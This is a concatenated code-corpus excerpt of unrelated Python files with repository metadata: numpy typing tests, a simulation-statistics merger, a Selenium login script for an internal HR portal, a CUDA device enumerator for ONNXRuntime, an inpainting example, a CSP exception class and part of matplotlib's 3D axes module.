... # pragma: no cover
LiteralWarning = Literal[
"default", "error", "ignore", "always", "module", "once"
]
cast = cast
def arraylike(a: ArrayLike | NestedSequence[ArrayLike]) -> NDArray:
...
def number_or_arraylike(
a: NumberOrArrayLike | NestedSequence[ArrayLike],
) -> NDArray:
...
a: DTypeFloating = np.float64(1)
b: float = 1
c: Floating = 1
d: ArrayLike = [c, c]
e: FloatingOrArrayLike = d
s_a: Sequence[DTypeFloating] = [a, a]
s_b: Sequence[float] = [b, b]
s_c: Sequence[Floating] = [c, c]
arraylike(a)
arraylike(b)
arraylike(c)
arraylike(d)
arraylike([d, d])
arraylike(e)
arraylike([e, e])
arraylike(s_a)
arraylike(s_b)
arraylike(s_c)
number_or_arraylike(a)
number_or_arraylike(b)
number_or_arraylike(c)
number_or_arraylike(d)
number_or_arraylike([d, d])
number_or_arraylike(e)
number_or_arraylike([e, e])
number_or_arraylike(s_a)
number_or_arraylike(s_b)
number_or_arraylike(s_c)
np.atleast_1d(a)
np.atleast_1d(b)
np.atleast_1d(c)
np.atleast_1d(arraylike(d))
np.atleast_1d(arraylike([d, d]))
np.atleast_1d(arraylike(e))
np.atleast_1d(arraylike([e, e]))
np.atleast_1d(s_a)
np.atleast_1d(s_b)
np.atleast_1d(s_c)
del a, b, c, d, e, s_a, s_b, s_c
| 21.694631
| 78
| 0.686775
|
540605e6e74e22300aa6ffe253639560d9ed9564
| 8,446
|
py
|
Python
|
project/scenarios/merge-stats.py
|
mfranzil-unitn/unitn-m-lpwniot
|
2094c5555918cdb2cd4f3cfb18790c53ef93b77a
|
[
"MIT"
] | 1
|
2022-03-04T13:08:52.000Z
|
2022-03-04T13:08:52.000Z
|
project/scenarios/merge-stats.py
|
mfranzil-unitn/unitn-m-lpwniot
|
2094c5555918cdb2cd4f3cfb18790c53ef93b77a
|
[
"MIT"
] | null | null | null |
project/scenarios/merge-stats.py
|
mfranzil-unitn/unitn-m-lpwniot
|
2094c5555918cdb2cd4f3cfb18790c53ef93b77a
|
[
"MIT"
] | null | null | null |
import json
import os
import sys
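# Usage sketch (assumed invocation): python3 merge-stats.py <mergename>
# where results/<mergename>/ holds one sub-folder per simulation fragment, each
# containing <fragment>-results.log, <fragment>-energest-merge.csv and <fragment>-dc.csv.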
mergename = sys.argv[1]
folder_name = 'results/' + mergename
testbed = False
fragments = sorted(os.listdir(folder_name))
# for fragment in fragments:
# fragname = fragment.split('.')[0]
# print("Analyzing the following files: ")
# print("Folder name: " + fragment)
# print("Energest: " + fragname + "-energest-merge.csv")
# print("Results: " + fragname + "-results.log")
# print("DC: " + fragname + "-dc.csv")
# Results
results = {
"avg_duty_cycle": [],
"std_dev": [],
"min_duty_cycle": [],
"max_duty_cycle": [],
"events_at_controller": [],
"collected_rounds_at_controller": [],
"failed_events": [],
"collect_pdr": [],
"commands_gen_controller": [],
"commands_recv_actuator": [],
"avg_actuation_pdr": [],
"sensor2-pdr": [],
"sensor3-pdr": [],
"sensor4-pdr": [],
"sensor5-pdr": [],
"sensor6-pdr": [],
}
for fragment in fragments:
fragname = fragment.split('.')[0]
with open(folder_name + "/" + fragname + "/" + fragname + "-results.log", 'r') as f:
for line in f:
if "AVERAGE DUTY CYCLE" in line:
# Line: AVERAGE DUTY CYCLE: 1.819%
duty_cycle = line.split(':')[1].strip().split('%')[0]
results["avg_duty_cycle"].append(float(duty_cycle))
elif "STANDARD DEVIATION" in line:
# Line: STANDARD DEVIATION: 0.735
std_dev = line.split(':')[1].strip()
results["std_dev"].append(float(std_dev))
elif "MINIMUM:" in line:
# Line: MINIMUM: 1.077%
min_duty_cycle = line.split(':')[1].strip().split('%')[0]
results["min_duty_cycle"].append(float(min_duty_cycle))
elif "MAXIMUM:" in line:
# Line: MAXIMUM: 1.819%
max_duty_cycle = line.split(':')[1].strip().split('%')[0]
results["max_duty_cycle"].append(float(max_duty_cycle))
elif "EVENTS AT CONTROLLER" in line:
# Line: EVENTS AT CONTROLLER: 4
events_at_controller = line.split(':')[1].strip()
results["events_at_controller"].append(int(events_at_controller))
elif "COLLECT ROUNDS AT CONTROLLER" in line:
# Line: COLLECT ROUNDS AT CONTROLLER: 4
collected_rounds_at_controller = line.split(':')[1].strip()
results["collected_rounds_at_controller"].append(int(collected_rounds_at_controller))
elif "FAILED EVENTS" in line:
# Line: FAILED EVENTS: 0
failed_events = line.split(':')[1].strip()
results["failed_events"].append(int(failed_events))
elif "COLLECT PDR" in line:
# Line: COLLECT PDR: 0.000
collect_pdr = line.split(':')[1].strip()
results["collect_pdr"].append(float(collect_pdr))
elif "COMMANDS GENERATED BY THE CONTROLLER" in line:
# Line: COMMANDS GENERATED BY THE CONTROLLER: 0
commands_gen_controller = line.split(':')[1].strip()
results["commands_gen_controller"].append(int(commands_gen_controller))
elif "COMMANDS RECEIVED BY ACTUATORS" in line:
# Line: COMMANDS RECEIVED BY ACTUATORS: 0
commands_recv_actuator = line.split(':')[1].strip()
results["commands_recv_actuator"].append(int(commands_recv_actuator))
elif "AVERAGE ACTUATION PDR" in line:
# Line: AVERAGE ACTUATION PDR: 0.000
avg_actuation_pdr = line.split(':')[1].strip()
results["avg_actuation_pdr"].append(float(avg_actuation_pdr))
elif "SENSOR 02:00 -- ACTUATION PDR" in line or "SENSOR f2:33 -- ACTUATION PDR" in line:
# Line: SENSOR 02:00 -- ACTUATION PDR: 0.000
sensor2_pdr = line.split(':')[2].strip()
results["sensor2-pdr"].append(float(sensor2_pdr))
elif "SENSOR 03:00 -- ACTUATION PDR" in line or "SENSOR f3:84 -- ACTUATION PDR" in line:
# Line: SENSOR 03:00 -- ACTUATION PDR: 0.000
sensor3_pdr = line.split(':')[2].strip()
results["sensor3-pdr"].append(float(sensor3_pdr))
elif "SENSOR 04:00 -- ACTUATION PDR" in line or "SENSOR f3:88 -- ACTUATION PDR" in line:
# Line: SENSOR 04:00 -- ACTUATION PDR: 0.000
sensor4_pdr = line.split(':')[2].strip()
results["sensor4-pdr"].append(float(sensor4_pdr))
elif "SENSOR 05:00 -- ACTUATION PDR" in line or "SENSOR f3:8b -- ACTUATION PDR" in line:
# Line: SENSOR 05:00 -- ACTUATION PDR: 0.000
sensor5_pdr = line.split(':')[2].strip()
results["sensor5-pdr"].append(float(sensor5_pdr))
elif "SENSOR 06:00 -- ACTUATION PDR" in line:
# Line: SENSOR 06:00 -- ACTUATION PDR: 0.000
sensor6_pdr = line.split(':')[2].strip()
results["sensor6-pdr"].append(float(sensor6_pdr))
# Extra case to trigger testbed notation
elif "SENSOR f7:e1 -- ACTUATION PDR" in line:
# Line: SENSOR f7:e1 -- ACTUATION PDR: 0.000
sensor6_pdr = line.split(':')[2].strip()
results["sensor6-pdr"].append(float(sensor6_pdr))
testbed = True
# Save the raw per-fragment results to a JSON summary
with open(folder_name + "/" + mergename + "-results-summary.json", 'w') as csvfile:
json.dump(results, csvfile)
# Calculate averages
for key in results:
results[key] = sum(results[key]) / len(results[key])
with open(folder_name + "/" + mergename + "-results.log", "w") as logfile:
logfile.write(f"""Namespace(logfile='{mergename}.log', testbed=False)
Logfile: {mergename}.log
Cooja simulation (merged stats out of {len(fragments)} fragments)
----- Duty Cycle Stats -----
AVERAGE DUTY CYCLE: {results["avg_duty_cycle"]:.3f}%
STANDARD DEVIATION: {results["std_dev"]:.3f}%
MINIMUM: {results["min_duty_cycle"]:.3f}%
MAXIMUM: {results["max_duty_cycle"]:.3f}%
----- Reliability Stats -----
# EVENTS AT CONTROLLER: {results["events_at_controller"]:.3f}
# COLLECT ROUNDS AT CONTROLLER: {results["collected_rounds_at_controller"]:.3f}
# FAILED EVENTS: {results["failed_events"]:.3f}
COLLECT PDR: {results["collect_pdr"]:.3f}
# COMMANDS GENERATED BY THE CONTROLLER: {results["commands_gen_controller"]:.3f}
# COMMANDS RECEIVED BY ACTUATORS: {results["commands_recv_actuator"]:.3f}
AVERAGE ACTUATION PDR: {results["avg_actuation_pdr"]:.3f}
SENSOR {"02:00" if not testbed else "f2:33"} -- ACTUATION PDR: {results["sensor2-pdr"]:.3f}
SENSOR {"03:00" if not testbed else "f3:84"} -- ACTUATION PDR: {results["sensor3-pdr"]:.3f}
SENSOR {"04:00" if not testbed else "f3:88"} -- ACTUATION PDR: {results["sensor4-pdr"]:.3f}
SENSOR {"05:00" if not testbed else "f3:8b"} -- ACTUATION PDR: {results["sensor5-pdr"]:.3f}
SENSOR {"06:00" if not testbed else "f7:e1"} -- ACTUATION PDR: {results["sensor6-pdr"]:.3f}
""")
# Energest
energest_lines = []
for fragment in fragments:
fragname = fragment.split('.')[0]
with open(folder_name + "/" + fragname + "/" + fragname + "-energest-merge.csv", 'r') as f:
lines = f.readlines()[1:]
for line in lines:
energest_lines.append("0," + line.replace("\n", ""))
with open(folder_name + "/" + mergename + "-energest.csv", 'w') as f:
f.write("time,node,cnt,cpu,lpm,tx,rx\n")
f.write("\n".join(energest_lines))
os.system('python3 parse-energest.py ' + folder_name + "/" + mergename + "-energest.csv")
os.system('trash ' + folder_name + "/" + mergename + "-energest.csv")
# DC
dc = {}
for fragment in fragments:
fragname = fragment.split('.')[0]
with open(folder_name + "/" + fragname + "/" + fragname + "-dc.csv", 'r') as f:
lines = f.readlines()[1:]
for line in lines:
fields = line.split(',')
node = int(float(fields[0]))
if node not in dc:
dc[node] = [float(fields[1])]
else:
dc[node].append(float(fields[1]))
# Calculate the average
for node in dc:
dc[node] = sum(dc[node]) / len(dc[node])
with open(folder_name + "/" + mergename + "-dc.csv", 'w') as f:
f.write("node,dc\n")
f.write("\n".join("{},{}".format(node, dc[node]) for node in dc))
| 43.989583
| 101
| 0.587852
|
105d813d717779f4f8ff1dc36865aa31970ebc1c
| 3,279
|
py
|
Python
|
login.py
|
darshit7/adrenalin-login
|
d803c5e7be5250afbf8fe70a4eca420e711b041c
|
[
"MIT"
] | 3
|
2017-01-10T04:31:27.000Z
|
2018-03-22T09:03:15.000Z
|
login.py
|
darshit7/adrenalin-login
|
d803c5e7be5250afbf8fe70a4eca420e711b041c
|
[
"MIT"
] | null | null | null |
login.py
|
darshit7/adrenalin-login
|
d803c5e7be5250afbf8fe70a4eca420e711b041c
|
[
"MIT"
] | null | null | null |
import os
import base64
import logging
import datetime
from cryptography.fernet import Fernet
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException, NoSuchElementException
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
def main():
logging.getLogger("selenium").setLevel(logging.INFO)
try:
path = os.environ['AD_LOG_PATH']
except KeyError:
path = ''
logging.basicConfig(filename=path+'adrenalin.log', format='%(levelname)s:%(message)s', level=logging.DEBUG)
logging.info('================================================================================')
logging.info('################# Started On %s #################', datetime.datetime.now())
class AdrenalinLogin():
"""
Class to login Adrenalin
"""
def __init__(self, url):
self.browser = webdriver.Chrome(executable_path='/usr/lib/chromium-browser/chromedriver')
self.browser.get("http://10.1.1.209/adrenalin/")
self.userid_field = self.browser.find_element_by_id("txtID")
self.pass_field = self.browser.find_element_by_id("txtPwd")
def login(self, userid, password):
self.userid_field.send_keys(userid)
self.pass_field.send_keys(password)
self.pass_field.send_keys(Keys.ENTER)
delay = 3 #seconds
try:
WebDriverWait(self.browser, delay).until(EC.presence_of_element_located((By.ID, "btnOK")))
logging.info("'OK button' located and clicked.")
print("Page is ready!")
except TimeoutException:
logging.info("Timeout while locating 'OK button'.")
except NoSuchElementException:
logging.info("Not able to locate 'OK button'.")
try:
WebDriverWait(self.browser, delay).until(EC.presence_of_element_located((By.ID, "lblExit"))).click()
logging.info("'Exit button' located and clicked.")
except TimeoutException:
logging.info("Timeout while locating 'Exit button'.")
except NoSuchElementException:
logging.info("Not able to locate 'Exit button'.")
def get_password(secret_key):
cipher_suite = Fernet(secret_key.encode(encoding="UTF-8"))
return (cipher_suite.decrypt(HASH.encode(encoding="UTF-8"))).decode(encoding="UTF-8")
if __name__ == "__main__":
main()
try:
HASH = os.environ['AD_PASS_HASH']
SECRET = os.environ['AD_SEC_KEY']
EMP_ID = os.environ['AD_EMP_ID']
AD_URL = os.environ['AD_URL']
except KeyError as key:
    logging.info('%s key not found in environment variables.', key)
logging.info('################# Finished On %s #################', datetime.datetime.now())
adrenalin_url = "http://10.1.1.209/adrenalin/"
obj = AdrenalinLogin(AD_URL)
logging.info('================================================================================')
obj.login(EMP_ID, get_password(SECRET))
logging.info('################# Finished On %s #################', datetime.datetime.now())
logging.info('================================================================================')
| 43.144737
| 112
| 0.603843
|
ea9d0cb4beaaae55690314ef5399939546097328
| 7,986
|
py
|
Python
|
xlib/onnxruntime/device.py
|
kitiv/DeepFaceLive
|
ca3a005917ae067576b795d8b9fef5a8b3483010
|
[
"MIT"
] | 4
|
2021-07-23T16:34:24.000Z
|
2022-03-01T18:31:59.000Z
|
xlib/onnxruntime/device.py
|
kitiv/DeepFaceLive
|
ca3a005917ae067576b795d8b9fef5a8b3483010
|
[
"MIT"
] | null | null | null |
xlib/onnxruntime/device.py
|
kitiv/DeepFaceLive
|
ca3a005917ae067576b795d8b9fef5a8b3483010
|
[
"MIT"
] | 1
|
2021-09-06T15:05:28.000Z
|
2021-09-06T15:05:28.000Z
|
import ctypes
import os
from typing import List
class ORTDeviceInfo:
"""
Represents picklable ONNXRuntime device info
"""
def __init__(self, index=None, name=None, total_memory=None, free_memory=None, compute_capability=None):
self._index : int = index
self._name : str = name
self._total_memory : int = total_memory
self._free_memory : int = free_memory
self._compute_capability : int = compute_capability
def __getstate__(self):
return self.__dict__.copy()
def __setstate__(self, d):
self.__init__()
self.__dict__.update(d)
def is_cpu(self) -> bool: return self._index == -1
def get_index(self) -> int:
return self._index
def get_compute_capability(self) -> int:
return self._compute_capability
def get_name(self) -> str:
return self._name
def get_total_memory(self) -> int:
return self._total_memory
def get_free_memory(self) -> int:
return self._free_memory
def __eq__(self, other):
if self is not None and other is not None and isinstance(self, ORTDeviceInfo) and isinstance(other, ORTDeviceInfo):
return self._index == other._index
return False
def __hash__(self):
return self._index
def __str__(self):
if self.is_cpu():
return f"CPU"
else:
return f"[{self._index}] {self._name} [{(self._total_memory / 1024**3) :.3}Gb]"
def __repr__(self):
return f'{self.__class__.__name__} object: ' + self.__str__()
# class ORTDevicesInfo:
# """
# a list of ORTDeviceInfo
# """
# def __init__(self, devices : List[ORTDeviceInfo] = None):
# if devices is None:
# devices = []
# self._devices = devices
# def __getstate__(self):
# return self.__dict__.copy()
# def __setstate__(self, d):
# self.__init__()
# self.__dict__.update(d)
# def add(self, device_or_devices : ORTDeviceInfo):
# if isinstance(device_or_devices, ORTDeviceInfo):
# if device_or_devices not in self._devices:
# self._devices.append(device_or_devices)
# elif isinstance(device_or_devices, ORTDevicesInfo):
# for device in device_or_devices:
# self.add(device)
# def copy(self):
# return copy.deepcopy(self)
# def get_count(self): return len(self._devices)
# def get_highest_total_memory_device(self) -> ORTDeviceInfo:
# """
# returns ORTDeviceInfo with highest available memory, if devices support total_memory parameter
# """
# result = None
# idx_mem = 0
# for device in self._devices:
# mem = device.get_total_memory()
# if result is None or (mem is not None and mem > idx_mem):
# result = device
# idx_mem = mem
# return result
# def get_lowest_total_memory_device(self) -> ORTDeviceInfo:
# """
# returns ORTDeviceInfo with lowest available memory, if devices support total_memory parameter
# """
# result = None
# idx_mem = sys.maxsize
# for device in self._devices:
# mem = device.get_total_memory()
# if result is None or (mem is not None and mem < idx_mem):
# result = device
# idx_mem = mem
# return result
# def __len__(self):
# return len(self._devices)
# def __getitem__(self, key):
# result = self._devices[key]
# if isinstance(key, slice):
# return self.__class__(result)
# return result
# def __iter__(self):
# for device in self._devices:
# yield device
# def __str__(self): return f'{self.__class__.__name__}:[' + ', '.join([ device.__str__() for device in self._devices ]) + ']'
# def __repr__(self): return f'{self.__class__.__name__}:[' + ', '.join([ device.__repr__() for device in self._devices ]) + ']'
_ort_devices_info = None
def get_cpu_device() -> ORTDeviceInfo:
return ORTDeviceInfo(index=-1, name='CPU', total_memory=0, free_memory=0, compute_capability=0)
def get_available_devices_info(include_cpu=True, cpu_only=False) -> List[ORTDeviceInfo]:
"""
returns a list of available ORTDeviceInfo
"""
global _ort_devices_info
if _ort_devices_info is None:
_initialize_ort_devices()
devices = []
if not cpu_only:
for i in range ( int(os.environ['ORT_DEVICES_COUNT']) ):
devices.append ( ORTDeviceInfo(index=i,
name=os.environ[f'ORT_DEVICE_{i}_NAME'],
total_memory=int(os.environ[f'ORT_DEVICE_{i}_TOTAL_MEM']),
free_memory=int(os.environ[f'ORT_DEVICE_{i}_FREE_MEM']),
compute_capability=int(os.environ[f'ORT_DEVICE_{i}_CC']) ))
if include_cpu or cpu_only:
devices.append(get_cpu_device())
_ort_devices_info = devices
return _ort_devices_info
def _initialize_ort_devices():
"""
    Determine available ORT devices and place info about them in os.environ,
    so that it is available in spawned subprocesses.
    Uses only Python ctypes and the default library shipped with NVIDIA drivers.
"""
if int(os.environ.get('ORT_DEVICES_INITIALIZED', 0)) == 0:
os.environ['ORT_DEVICES_INITIALIZED'] = '1'
os.environ['ORT_DEVICES_COUNT'] = '0'
os.environ['CUDA_CACHE_MAXSIZE'] = '2147483647'
try:
libnames = ('libcuda.so', 'libcuda.dylib', 'nvcuda.dll')
for libname in libnames:
try:
cuda = ctypes.CDLL(libname)
except:
continue
else:
break
else:
return
nGpus = ctypes.c_int()
name = b' ' * 200
cc_major = ctypes.c_int()
cc_minor = ctypes.c_int()
freeMem = ctypes.c_size_t()
totalMem = ctypes.c_size_t()
device = ctypes.c_int()
context = ctypes.c_void_p()
devices = []
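            # Enumerate GPUs through the CUDA driver API: cuInit/cuDeviceGetCount
            # list the devices, cuDeviceGetName and cuDeviceComputeCapability read
            # per-device properties, and a temporary context is created so
            # cuMemGetInfo_v2 can report free/total memory before being detached.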
if cuda.cuInit(0) == 0 and \
cuda.cuDeviceGetCount(ctypes.byref(nGpus)) == 0:
for i in range(nGpus.value):
if cuda.cuDeviceGet(ctypes.byref(device), i) != 0 or \
cuda.cuDeviceGetName(ctypes.c_char_p(name), len(name), device) != 0 or \
cuda.cuDeviceComputeCapability(ctypes.byref(cc_major), ctypes.byref(cc_minor), device) != 0:
continue
if cuda.cuCtxCreate_v2(ctypes.byref(context), 0, device) == 0:
if cuda.cuMemGetInfo_v2(ctypes.byref(freeMem), ctypes.byref(totalMem)) == 0:
cc = cc_major.value * 10 + cc_minor.value
devices.append ({'name' : name.split(b'\0', 1)[0].decode(),
'total_mem' : totalMem.value,
'free_mem' : freeMem.value,
'cc' : cc
})
cuda.cuCtxDetach(context)
except Exception as e:
print(f'CUDA devices initialization error: {e}')
devices = []
os.environ['ORT_DEVICES_COUNT'] = str(len(devices))
for i, device in enumerate(devices):
os.environ[f'ORT_DEVICE_{i}_NAME'] = device['name']
os.environ[f'ORT_DEVICE_{i}_TOTAL_MEM'] = str(device['total_mem'])
os.environ[f'ORT_DEVICE_{i}_FREE_MEM'] = str(device['free_mem'])
os.environ[f'ORT_DEVICE_{i}_CC'] = str(device['cc'])
_initialize_ort_devices()
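# Minimal usage sketch: list the devices discovered above. It assumes the
# imports at the top of this module (os, ctypes, typing.List) are present and
# only calls functions defined in this file.
if __name__ == '__main__':
    for device_info in get_available_devices_info(include_cpu=True):
        print(device_info, '| compute capability:', device_info.get_compute_capability())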
| 35.811659
| 132
| 0.563862
|
d06d1563b3de44fa9a1f3e3d7a5df14f7109a9d4
| 387
|
py
|
Python
|
csp/contradiction_exception.py
|
abeccaro/csp-solver
|
a761dee02a4dd12162eb55ef34cc0989c79567cc
|
[
"MIT"
] | null | null | null |
csp/contradiction_exception.py
|
abeccaro/csp-solver
|
a761dee02a4dd12162eb55ef34cc0989c79567cc
|
[
"MIT"
] | null | null | null |
csp/contradiction_exception.py
|
abeccaro/csp-solver
|
a761dee02a4dd12162eb55ef34cc0989c79567cc
|
[
"MIT"
] | null | null | null |
class ContradictionException(Exception):
"""Exception raised for any Contradiction (unfeasability) happening during propagation or assignments.
:param message: The message to print
:type message: str
"""
def __init__(self, message):
self.message = message
    def __str__(self):
return 'ContradictionException: ' + self.message
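if __name__ == '__main__':
    # Minimal usage sketch: propagation code would typically raise this exception
    # when a variable's domain becomes empty, and the search loop would catch it
    # to trigger backtracking.
    try:
        raise ContradictionException("domain of variable x became empty")
    except ContradictionException as error:
        print(error)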
| 27.642857
| 107
| 0.661499
|
9f549d9c9efa1b21d0b72dd3fb30f00e5f5bbc41
| 1,219
|
py
|
Python
|
examples/example_inpainting.py
|
mmunar97/inPYinting
|
226e7840c0acf0b0fe3cf6db25a1411df6595a02
|
[
"MIT"
] | 1
|
2020-06-02T14:01:40.000Z
|
2020-06-02T14:01:40.000Z
|
examples/example_inpainting.py
|
mmunar97/inPYinting
|
226e7840c0acf0b0fe3cf6db25a1411df6595a02
|
[
"MIT"
] | null | null | null |
examples/example_inpainting.py
|
mmunar97/inPYinting
|
226e7840c0acf0b0fe3cf6db25a1411df6595a02
|
[
"MIT"
] | null | null | null |
import cv2
from inPYinting.base.inpainting_algorithms import InpaintingAlgorithm
from inPYinting.inpainter import Inpainter
if __name__ == "__main__":
image_path = r"C:\Users\Usuario\Desktop\Inpainting Demo\mumford_shah_clean.png"
mask_path = r"C:\Users\Usuario\Desktop\Inpainting Demo\mumford_shah_mask.png"
image = cv2.imread(image_path)
mask = 255-cv2.imread(mask_path, cv2.IMREAD_GRAYSCALE)
inpainter = Inpainter(image=image, mask=mask)
#result_fm = inpainter.inpaint(InpaintingAlgorithm.FAST_MARCHING)
result_ns = inpainter.inpaint(InpaintingAlgorithm.NAVIER_STOKES)
#result_sc = inpainter.inpaint(InpaintingAlgorithm.SOFTCOLOR_FUZZY_MORPHOLOGY)
#result_eb = inpainter.inpaint(InpaintingAlgorithm.EXEMPLAR_BASED)
#result_pde_amle = inpainter.inpaint(InpaintingAlgorithm.PDE_AMLE)
#result_pde_har = inpainter.inpaint(InpaintingAlgorithm.PDE_HARMONIC)
#result_pde_ms = inpainter.inpaint(InpaintingAlgorithm.PDE_MUMFORD_SHAH)
#result_pde_ch = inpainter.inpaint(InpaintingAlgorithm.PDE_CAHN_HILLIARD)
#result_pde_tr = inpainter.inpaint(InpaintingAlgorithm.PDE_TRANSPORT)
cv2.imwrite(r"C:\Users\Usuario\Desktop\inpaint.png", result_ns.inpainted_image)
| 45.148148
| 83
| 0.803117
|
4392bb0b1571c7fae21d8c6e03c05aeb90519b50
| 103,120
|
py
|
Python
|
venv/Lib/site-packages/mpl_toolkits/mplot3d/axes3d.py
|
adityasagam/azurePy
|
bf6c61c1d6f52521602bae2ab3f06ffba4e30444
|
[
"MIT"
] | 130
|
2018-02-03T10:25:54.000Z
|
2022-03-25T22:27:22.000Z
|
venv/Lib/site-packages/mpl_toolkits/mplot3d/axes3d.py
|
uncledragon/CalibrationLibrary
|
952abcf471b819b6b6dfa23b6d5dd248155f9dbf
|
[
"MIT"
] | 12
|
2021-03-09T03:01:16.000Z
|
2022-03-11T23:59:36.000Z
|
venv/Lib/site-packages/mpl_toolkits/mplot3d/axes3d.py
|
uncledragon/CalibrationLibrary
|
952abcf471b819b6b6dfa23b6d5dd248155f9dbf
|
[
"MIT"
] | 64
|
2018-04-25T08:51:57.000Z
|
2022-01-29T14:13:57.000Z
|
"""
axes3d.py, original mplot3d version by John Porter
Created: 23 Sep 2005
Parts fixed by Reinier Heeres <reinier@heeres.eu>
Minor additions by Ben Axelrod <baxelrod@coroware.com>
Significant updates and revisions by Ben Root <ben.v.root@gmail.com>
Module containing Axes3D, an object which can plot 3D objects on a
2D matplotlib figure.
"""
from functools import reduce
from collections import defaultdict
import math
import warnings
import numpy as np
from matplotlib import artist
import matplotlib.axes as maxes
import matplotlib.cbook as cbook
import matplotlib.collections as mcoll
import matplotlib.colors as mcolors
import matplotlib.docstring as docstring
import matplotlib.scale as mscale
import matplotlib.transforms as mtransforms
from matplotlib.axes import Axes, rcParams
from matplotlib.colors import Normalize, LightSource
from matplotlib.transforms import Bbox
from matplotlib.tri.triangulation import Triangulation
from . import art3d
from . import proj3d
from . import axis3d
def unit_bbox():
box = Bbox(np.array([[0, 0], [1, 1]]))
return box
class Axes3D(Axes):
"""
3D axes object.
"""
name = '3d'
_shared_z_axes = cbook.Grouper()
def __init__(
self, fig, rect=None, *args,
azim=-60, elev=30, zscale=None, sharez=None, proj_type='persp',
**kwargs):
'''
Build an :class:`Axes3D` instance in
:class:`~matplotlib.figure.Figure` *fig* with
*rect=[left, bottom, width, height]* in
:class:`~matplotlib.figure.Figure` coordinates
Optional keyword arguments:
================ =========================================
Keyword Description
================ =========================================
*azim* Azimuthal viewing angle (default -60)
*elev* Elevation viewing angle (default 30)
*zscale* [%(scale)s]
*sharez* Other axes to share z-limits with
*proj_type* 'persp' or 'ortho' (default 'persp')
================ =========================================
.. versionadded :: 1.2.1
*sharez*
''' % {'scale': ' | '.join([repr(x) for x in mscale.get_scale_names()])}
if rect is None:
rect = [0.0, 0.0, 1.0, 1.0]
self._cids = []
self.initial_azim = azim
self.initial_elev = elev
self.set_proj_type(proj_type)
self.xy_viewLim = unit_bbox()
self.zz_viewLim = unit_bbox()
self.xy_dataLim = unit_bbox()
self.zz_dataLim = unit_bbox()
        # inhibit autoscale_view until the axes are defined
# they can't be defined until Axes.__init__ has been called
self.view_init(self.initial_elev, self.initial_azim)
self._ready = 0
self._sharez = sharez
if sharez is not None:
self._shared_z_axes.join(self, sharez)
self._adjustable = 'datalim'
super().__init__(fig, rect, frameon=True, *args, **kwargs)
# Disable drawing of axes by base class
super().set_axis_off()
# Enable drawing of axes by Axes3D class
self.set_axis_on()
self.M = None
# func used to format z -- fall back on major formatters
self.fmt_zdata = None
if zscale is not None:
self.set_zscale(zscale)
if self.zaxis is not None:
self._zcid = self.zaxis.callbacks.connect(
'units finalize', lambda: self._on_units_changed(scalez=True))
else:
self._zcid = None
self._ready = 1
self.mouse_init()
self.set_top_view()
self.patch.set_linewidth(0)
# Calculate the pseudo-data width and height
pseudo_bbox = self.transLimits.inverted().transform([(0, 0), (1, 1)])
self._pseudo_w, self._pseudo_h = pseudo_bbox[1] - pseudo_bbox[0]
self.figure.add_axes(self)
# mplot3d currently manages its own spines and needs these turned off
# for bounding box calculations
for k in self.spines.keys():
self.spines[k].set_visible(False)
def set_axis_off(self):
self._axis3don = False
self.stale = True
def set_axis_on(self):
self._axis3don = True
self.stale = True
def have_units(self):
"""
Return *True* if units are set on the *x*, *y*, or *z* axes
"""
return (self.xaxis.have_units() or self.yaxis.have_units() or
self.zaxis.have_units())
def convert_zunits(self, z):
"""
For artists in an axes, if the zaxis has units support,
convert *z* using zaxis unit type
.. versionadded :: 1.2.1
"""
return self.zaxis.convert_units(z)
def _process_unit_info(self, xdata=None, ydata=None, zdata=None,
kwargs=None):
"""
Look for unit *kwargs* and update the axis instances as necessary
"""
super()._process_unit_info(xdata=xdata, ydata=ydata, kwargs=kwargs)
if self.xaxis is None or self.yaxis is None or self.zaxis is None:
return
if zdata is not None:
# we only need to update if there is nothing set yet.
if not self.zaxis.have_units():
                self.zaxis.update_units(zdata)
# process kwargs 2nd since these will override default units
if kwargs is not None:
zunits = kwargs.pop('zunits', self.zaxis.units)
if zunits != self.zaxis.units:
self.zaxis.set_units(zunits)
# If the units being set imply a different converter,
# we need to update.
if zdata is not None:
self.zaxis.update_units(zdata)
def set_top_view(self):
# this happens to be the right view for the viewing coordinates
# moved up and to the left slightly to fit labels and axes
xdwl = (0.95/self.dist)
xdw = (0.9/self.dist)
ydwl = (0.95/self.dist)
ydw = (0.9/self.dist)
# This is purposely using the 2D Axes's set_xlim and set_ylim,
# because we are trying to place our viewing pane.
super().set_xlim(-xdwl, xdw, auto=None)
super().set_ylim(-ydwl, ydw, auto=None)
def _init_axis(self):
'''Init 3D axes; overrides creation of regular X/Y axes'''
self.w_xaxis = axis3d.XAxis('x', self.xy_viewLim.intervalx,
self.xy_dataLim.intervalx, self)
self.xaxis = self.w_xaxis
self.w_yaxis = axis3d.YAxis('y', self.xy_viewLim.intervaly,
self.xy_dataLim.intervaly, self)
self.yaxis = self.w_yaxis
self.w_zaxis = axis3d.ZAxis('z', self.zz_viewLim.intervalx,
self.zz_dataLim.intervalx, self)
self.zaxis = self.w_zaxis
for ax in self.xaxis, self.yaxis, self.zaxis:
ax.init3d()
def get_children(self):
return [self.zaxis] + super().get_children()
def _get_axis_list(self):
return super()._get_axis_list() + (self.zaxis, )
def unit_cube(self, vals=None):
minx, maxx, miny, maxy, minz, maxz = vals or self.get_w_lims()
return [(minx, miny, minz),
(maxx, miny, minz),
(maxx, maxy, minz),
(minx, maxy, minz),
(minx, miny, maxz),
(maxx, miny, maxz),
(maxx, maxy, maxz),
(minx, maxy, maxz)]
def tunit_cube(self, vals=None, M=None):
if M is None:
M = self.M
xyzs = self.unit_cube(vals)
tcube = proj3d.proj_points(xyzs, M)
return tcube
def tunit_edges(self, vals=None, M=None):
tc = self.tunit_cube(vals, M)
edges = [(tc[0], tc[1]),
(tc[1], tc[2]),
(tc[2], tc[3]),
(tc[3], tc[0]),
(tc[0], tc[4]),
(tc[1], tc[5]),
(tc[2], tc[6]),
(tc[3], tc[7]),
(tc[4], tc[5]),
(tc[5], tc[6]),
(tc[6], tc[7]),
(tc[7], tc[4])]
return edges
@artist.allow_rasterization
def draw(self, renderer):
# draw the background patch
self.patch.draw(renderer)
self._frameon = False
# first, set the aspect
# this is duplicated from `axes._base._AxesBase.draw`
# but must be called before any of the artist are drawn as
# it adjusts the view limits and the size of the bounding box
# of the axes
locator = self.get_axes_locator()
if locator:
pos = locator(self, renderer)
self.apply_aspect(pos)
else:
self.apply_aspect()
# add the projection matrix to the renderer
self.M = self.get_proj()
renderer.M = self.M
